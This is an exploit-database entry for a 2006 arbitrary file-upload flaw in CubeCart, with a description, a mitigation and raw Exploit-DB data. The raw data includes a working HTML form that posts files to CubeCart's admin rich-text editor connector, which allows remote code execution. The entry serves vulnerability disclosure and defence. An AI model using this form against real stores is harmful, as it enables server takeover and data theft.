header-logo
Suggest Exploit
vendor:
CubeCart
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: CubeCart
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

CubeCart Arbitrary File Upload Vulnerability

CubeCart is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Ensure that the application is configured to only allow the upload of files with appropriate extensions and that the application is configured to only allow the upload of files with appropriate content.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16796/info

CubeCart is prone to an arbitrary file-upload vulnerability. 

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

<form action="http://www.example.com/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFol
der=/"
method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>

Navigation

Suggest Exploit

Services By CQR